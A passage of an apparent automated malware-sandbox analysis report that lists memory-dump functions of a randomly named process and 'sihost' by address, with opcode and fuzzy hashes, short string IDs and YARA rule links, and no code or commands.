              • Opcode ID: f496424a3208d43598a5d25826d9a8bd051924254b3310f02843cc0281b66fef
              • Instruction ID: af21d0bd5f9d9c8fcfb0a88406959f208265cd4bdca63a67d5eb93058f0161e7
              • Opcode Fuzzy Hash: f496424a3208d43598a5d25826d9a8bd051924254b3310f02843cc0281b66fef
              • Instruction Fuzzy Hash: 5701D6F9D1D55E8AE752AB78D89D1F93AE0EF94301F0505BADA08C2092DB25D44C8680
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C538 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de4f5f10964d61ed77a07a8a599f0a5c485faede4a5ae8e75c1cdb5e036b228f
              • Instruction ID: 0e2f8f18ac23360e393983e07c83158209a1f0d87791c9458aa7510457987a1f
              • Opcode Fuzzy Hash: de4f5f10964d61ed77a07a8a599f0a5c485faede4a5ae8e75c1cdb5e036b228f
              • Instruction Fuzzy Hash: F201ADF1C1964E9EEB96EE38C8092FE7FE0FF04301F00063AEC28C2291DB3195588690
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3745C Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440931850.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf35000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e71326f31f57ab75a0d8eb8d2add629c80779605403683d3befc74bf7cd0c5f3
              • Instruction ID: 9d3790ebf9dc8757ebb36994f171ef174df7dfcce4bd7a7986b26ee6708b1fb9
              • Opcode Fuzzy Hash: e71326f31f57ab75a0d8eb8d2add629c80779605403683d3befc74bf7cd0c5f3
              • Instruction Fuzzy Hash: 2511FAB4D0961A9FDBA6DB28C8847E9B3B4EB58301F1041E6D40DA3385DB399AC9CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3332A Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 27eb517ad670b41bafae317b41d6ddc8d2bd54fca1b8a520cb96660d7d68a979
              • Instruction ID: 0b50dfd67930dfa667680b57ad41c61430372d74ba015c62ba3f0e81beed3a05
              • Opcode Fuzzy Hash: 27eb517ad670b41bafae317b41d6ddc8d2bd54fca1b8a520cb96660d7d68a979
              • Instruction Fuzzy Hash: F6017CB0D1851E9EEB91EB78C48C1F97AE4FF58300F504976D818C62A1EE34E5498740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3273D Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cbba395ca4100df0d6c79f479e1575a8e086d089cb0face0c2b1cf00d1be265
              • Instruction ID: 93bcf5b86c5b07b0c1c84102fb41ed88df0eb547a9226d15171d7123a2ef6152
              • Opcode Fuzzy Hash: 6cbba395ca4100df0d6c79f479e1575a8e086d089cb0face0c2b1cf00d1be265
              • Instruction Fuzzy Hash: 1B017CB091A64AAFE752EB78C84D1F97BE0FF59300F4148B6D828C71A2EA35E4488741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A629 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2de0872fee8c06cb323761d3db865a26bc78018a6d8c63e54385347dc168bc62
              • Instruction ID: e76f702d9b8b35b6fbfb15f762007fa16e91e1108b8f5d8473549d2af67819f7
              • Opcode Fuzzy Hash: 2de0872fee8c06cb323761d3db865a26bc78018a6d8c63e54385347dc168bc62
              • Instruction Fuzzy Hash: 1E019EA0A0E6895EE752EB74885C1E93BF4EF19300F0509F3D818C71A2DA25E4488711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30200 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38e7fdf234760f1e4d7591f953e863eabc260c92fb0221a75b5cb9432486818a
              • Instruction ID: df85405f4a6b4ae83653ae37308292d2655df50d995d914435237af0423b9b5b
              • Opcode Fuzzy Hash: 38e7fdf234760f1e4d7591f953e863eabc260c92fb0221a75b5cb9432486818a
              • Instruction Fuzzy Hash: 95016DB091590E9AEB59EB34C4582FD77A0FF18305F50087EE82EC6292DF36A555CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30208 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f204579f7c3866b3b8d6fd86a2a7bac6e4d738061cadadcbce924dfc1fdfff04
              • Instruction ID: ae36721c1e1e5a11d8a7ae56228bab3b3cbdecd2ce608c069f8dde65acbfaecc
              • Opcode Fuzzy Hash: f204579f7c3866b3b8d6fd86a2a7bac6e4d738061cadadcbce924dfc1fdfff04
              • Instruction Fuzzy Hash: 08016DB0915A1E9EEB59EB74C45D2FA77A0FF18304F50087EE82EC2292DF36A154C610
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF317BD Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dea6037e0c80028775f196f8ae7fd1e543439a3e0fb540e32a0c991c238d276f
              • Instruction ID: d07dd2e8d708fe105f2b8cfc4ba7108c8bb9e2de4a8a47a0b48c0308c5451dea
              • Opcode Fuzzy Hash: dea6037e0c80028775f196f8ae7fd1e543439a3e0fb540e32a0c991c238d276f
              • Instruction Fuzzy Hash: 9E01D1B080A68D8FDF95DF38C4596FA3BE0FF55301F4440BAE818C2292CA76D854C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30D20 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93ca6cc97806a96c822fd1f3b4bba4d92eaed208e6e70940a8c11863b82cc683
              • Instruction ID: 608362499b71376840131e42a17dacda64747ed30c4ffe56e554755a2728b649
              • Opcode Fuzzy Hash: 93ca6cc97806a96c822fd1f3b4bba4d92eaed208e6e70940a8c11863b82cc683
              • Instruction Fuzzy Hash: 69F0F4B1C2954EAAEB669678D80C3FD77E0FB55314F00057BD82DC1581CF7561488241
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420F8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 556c3abd86a645c3c8fc4ccdd4d555b239cf90401991ffd588560b9b75425cc0
              • Instruction ID: b6d215460951bbdc896e465f586d60190c175e86f0d9ac14f6d74974ce3542c0
              • Opcode Fuzzy Hash: 556c3abd86a645c3c8fc4ccdd4d555b239cf90401991ffd588560b9b75425cc0
              • Instruction Fuzzy Hash: 7BF0A4F8C1D55E8AE752AB78C89D1F93AE0EF54300F0104BADA48C2092EB25D4488640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF301C8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c6ab97faf5fdd3b63be9db7db0550500b4256c75de7b7a11b231b86c5afb584
              • Instruction ID: 79b011c8a9aa4595b43cf941916183e0211ad73aa0c7c5de9018791a7a6db254
              • Opcode Fuzzy Hash: 7c6ab97faf5fdd3b63be9db7db0550500b4256c75de7b7a11b231b86c5afb584
              • Instruction Fuzzy Hash: 4DF0AFB080950E9FEF95EE38D4492FA37A4EF15304F40443AE81DC2281CA76E494CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46D93 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction ID: 3ea8a4948f299595197ed4065924312948db2af89a313b05769d5a0218247b07
              • Opcode Fuzzy Hash: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction Fuzzy Hash: C5012CB5C0921ACFDF15CFA0D8856FC77B0AF18321F14023AD406A22C0CA396548DB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF33234 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80285446256efc3ec20e5587fd4ee5c7bfe767c14b9a9bbc4f19e13a8578790d
              • Instruction ID: 4f16f0a18acd23646507dd76ea3912dcc27c7bb4a61569a5a2101be960afdf96
              • Opcode Fuzzy Hash: 80285446256efc3ec20e5587fd4ee5c7bfe767c14b9a9bbc4f19e13a8578790d
              • Instruction Fuzzy Hash: 0FF031F1D095199FEB59DA78C0996FC7BB1AF54300F105039D819923C2CA3A9589DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32659 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c250e4244521c6cecf9ae0e26a73c0dd281fd89a43f7f7af439da4c719a39b7
              • Instruction ID: fa6a66ff5c634be1dedf620a560b50ae43f78ec94715377de31ac945c7fc2a9e
              • Opcode Fuzzy Hash: 2c250e4244521c6cecf9ae0e26a73c0dd281fd89a43f7f7af439da4c719a39b7
              • Instruction Fuzzy Hash: 38F062B090E3899FE75A9B3488291E93FB0FF16201F4504BEE829C62D3DB699958C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3AD58 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cdee3163c0d3effe2b865454b749482b97551741203934a75c041b153c8fa895
              • Instruction ID: 005f80359015fba15c424007a9f378c50c2a09a04f0b48664c519fe03e36e68f
              • Opcode Fuzzy Hash: cdee3163c0d3effe2b865454b749482b97551741203934a75c041b153c8fa895
              • Instruction Fuzzy Hash: D1F044B0D4A51DDEEB52EB28C489BE9B7B1FF59300F5042A9C41DD3152CB35D9858F40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF326CD Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440791664.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf30000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92b96438484aba374e1e7cc483da28433f973e5ce0a021ad6844e9655ab245cc
              • Instruction ID: 2e33513bb3c37bb5a75aa1f9e5a265a09d0da8fc2b28aca7a0c87e4b39142664
              • Opcode Fuzzy Hash: 92b96438484aba374e1e7cc483da28433f973e5ce0a021ad6844e9655ab245cc
              • Instruction Fuzzy Hash: 58F0C2B080A38A5FE76A9B34882D2F93AA0FF05200F4004BAE829C5192DB399458C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40580 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53f63b81762e5a7e081aff7096d394420d94055aee2e89f251834ecd4b26e74f
              • Instruction ID: 5a65aed9378fc79d16344d64624a4a81d8a38906c3584f35d85e8ab264fa46b3
              • Opcode Fuzzy Hash: 53f63b81762e5a7e081aff7096d394420d94055aee2e89f251834ecd4b26e74f
              • Instruction Fuzzy Hash: 84F03AB081995E9EEB95EF78C84D6FA76E0FF18300F40093AEC29C2190DB3095548B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF470A4 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5e110991edecbc9a2e0b8100923fe89ee3d10c03d252721f3f8340e52d98c862
              • Instruction ID: 77581bc018b5e9c2a9f0b7061b153b52aa7e8687647dd40bea395a5067ba36c1
              • Opcode Fuzzy Hash: 5e110991edecbc9a2e0b8100923fe89ee3d10c03d252721f3f8340e52d98c862
              • Instruction Fuzzy Hash: F2F058B1E0845D8BEF04EBA8D8814FCB7F5EF98310F60003AD109E7282CA29AA05CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF381D5 Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440931850.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf35000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fcce33ddaa47779f76a5086490ed36447abe130eb5b013289bed44f0f14737b5
              • Instruction ID: 7a987844019845801fc093e3264467b9b143a31b8c01bdc0da03bc793c905526
              • Opcode Fuzzy Hash: fcce33ddaa47779f76a5086490ed36447abe130eb5b013289bed44f0f14737b5
              • Instruction Fuzzy Hash: 2CF0A9F4D0961A9FDBA6DB28C8487F9B7F4AB18301F1001E6941D92382CA399BC99F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF36E0B Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.440931850.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf35000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e5088f5da93ebf5594b8c8dd6bb13cf76b259d2ba8076d18426de757a91cae7a
              • Instruction ID: 1fcbadfaf982311f79caedc1664e4ff340256703b6b2c8908709522c2b33e1a5
              • Opcode Fuzzy Hash: e5088f5da93ebf5594b8c8dd6bb13cf76b259d2ba8076d18426de757a91cae7a
              • Instruction Fuzzy Hash: D0F0FEF4D0961A9FDBA6DB28C8447E9B7F4EB18300F1001E5940DD3342CA349BC59F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43401 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction ID: 9dc311045e26fc69bd3f563dcec1af025cd0c67696bf17ab9d29c570dfb04dee
              • Opcode Fuzzy Hash: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction Fuzzy Hash: 6DE0C270859A0C6BCB11AF69E8482D873B5FB48314F000639D80CD7041D73A9998C700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BA62 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.441130971.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf3a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction ID: 6d5fc07cf25d37f0e3624735fd2104bd2d61c0d6a46bcfd1c08da9e1adb468b4
              • Opcode Fuzzy Hash: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction Fuzzy Hash: ACD0E2B5A0882DCF8F40EFE8D8041ECB3B0FB58301B000032D81DE3240CB20A8148B40
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00007FFBACF407CF Relevance: 5.1, Strings: 4, Instructions: 120COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: "$+$/$]
              • API String ID: 0-387013541
              • Opcode ID: 0aaa483b33cea8ad6999e080954f85a3de31984d38780b329e0a7fa5a542ca4b
              • Instruction ID: 2b0b2580bab97eaf025b1e0ed880e4f8746d776e9b37c48f09f86f0a49c7ff92
              • Opcode Fuzzy Hash: 0aaa483b33cea8ad6999e080954f85a3de31984d38780b329e0a7fa5a542ca4b
              • Instruction Fuzzy Hash: 5151E3B0D1562DCFEB69DB64C894BE9B7B2FF48301F1041A9D40DA7291DB39AA85CF00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF406E7 Relevance: 5.1, Strings: 4, Instructions: 88COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: "$)$+$/
              • API String ID: 0-3570642953
              • Opcode ID: 9d47cc7c6f9f8f284273e54773ea8e5c4d859b6bd83d8c4631c5d020c2de061a
              • Instruction ID: 134295bf36de4a38f15a8cbcdfa849805eeb7f0279f2e256f2e2264616af025a
              • Opcode Fuzzy Hash: 9d47cc7c6f9f8f284273e54773ea8e5c4d859b6bd83d8c4631c5d020c2de061a
              • Instruction Fuzzy Hash: 8D41C8B0D0922D8FDB69DF24C9987F9B7B1BF54305F1041AAD44DA7291CB399A88DF01
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40A47 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.441355903.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffbacf40000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: &$/$[${
              • API String ID: 0-2536217607
              • Opcode ID: 457a6003c20e08f06fb1bc7589a9ee0d80fbc19394496472fa401207ef97e16d
              • Instruction ID: 61a702b30058154427464b06aad7668b7eef38b300493da55ff6c92ba1ae9d37
              • Opcode Fuzzy Hash: 457a6003c20e08f06fb1bc7589a9ee0d80fbc19394496472fa401207ef97e16d
              • Instruction Fuzzy Hash: A63184B0D0922A8BEB6DCF74D9987BDB6B2AF48315F10417ED41EA7281CB395984DF04
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              Function 00007FFBACF4EC8D Relevance: 5.1, Strings: 4, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: #$3$A$[
              • API String ID: 0-1255984973
              • Opcode ID: a37206e20d52f971ac97dd02c63f82fb893cd65e170a8574971376d14ecc365b
              • Instruction ID: 86fea3ec6f8bbd111aa62071c2cb8cf985fdca2880151ae5a4fb3cf7b827c496
              • Opcode Fuzzy Hash: a37206e20d52f971ac97dd02c63f82fb893cd65e170a8574971376d14ecc365b
              • Instruction Fuzzy Hash: AC21EAB0D096298BEB69DF24C9957E9B7B1BF58300F0041ADD80DA6281CB79AA84CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4EE6E Relevance: 2.6, Strings: 2, Instructions: 73COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: 3$A
              • API String ID: 0-694096507
              • Opcode ID: e646451965d970028313fabc5180623e23905b015f675a97534f3f714f8fcff5
              • Instruction ID: d151741b443cedf24a47b5e29fec9d6e644b5eb84e5fe839633e3e6cffdb024c
              • Opcode Fuzzy Hash: e646451965d970028313fabc5180623e23905b015f675a97534f3f714f8fcff5
              • Instruction Fuzzy Hash: 80310BB0D0962A8FDBA9DF24C8997E9B7B1FB54310F0042E9D55DA7281CB35AE84CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4C3AD Relevance: 1.4, Strings: 1, Instructions: 173COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 7d6a9fc75151a84fc626e02cfbf1b52b4c7345c86975ffd4c3c1ec5e3c1113e3
              • Instruction ID: 5f77ae14bd2871cbd8dbfe220703f73d4938a3b07077fed3060a66109f19a138
              • Opcode Fuzzy Hash: 7d6a9fc75151a84fc626e02cfbf1b52b4c7345c86975ffd4c3c1ec5e3c1113e3
              • Instruction Fuzzy Hash: 6D41B3BBD18A2A4AEB11BB7DF4450FE77D0DF81331F001577D688C5092DF29B48A8AA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4F4DA Relevance: 1.4, Strings: 1, Instructions: 156COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: M
              • API String ID: 0-3664761504
              • Opcode ID: 27f61e5c7174178e4db2fb814968e2a4dcdd597588520350db4df69d46d6f6e9
              • Instruction ID: b1a8f8eadf8955c213c116347a00495783d8e4fc799d9e9036c03760ced027a0
              • Opcode Fuzzy Hash: 27f61e5c7174178e4db2fb814968e2a4dcdd597588520350db4df69d46d6f6e9
              • Instruction Fuzzy Hash: 55512BB0D09A2D8FDBA4DB28C8957A9B7F1FB58301F4001EAC50DE3291DE35AE858F45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4C35D Relevance: 1.4, Strings: 1, Instructions: 154COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 64b94f404cbb8de3bb16ecc675a995a74b85aac272ab39f4906e4afcaf489747
              • Instruction ID: 4a47c3530fc473d1843be961e8f3582f324def37a1ecf2fd3623af036e830d34
              • Opcode Fuzzy Hash: 64b94f404cbb8de3bb16ecc675a995a74b85aac272ab39f4906e4afcaf489747
              • Instruction Fuzzy Hash: 0341C3BBD1862A4AE711BB7DF4451FE7BD0DF81331F041537D648C5092DF25B48A8AA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4C4AB Relevance: 1.4, Strings: 1, Instructions: 119COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID: }]_^
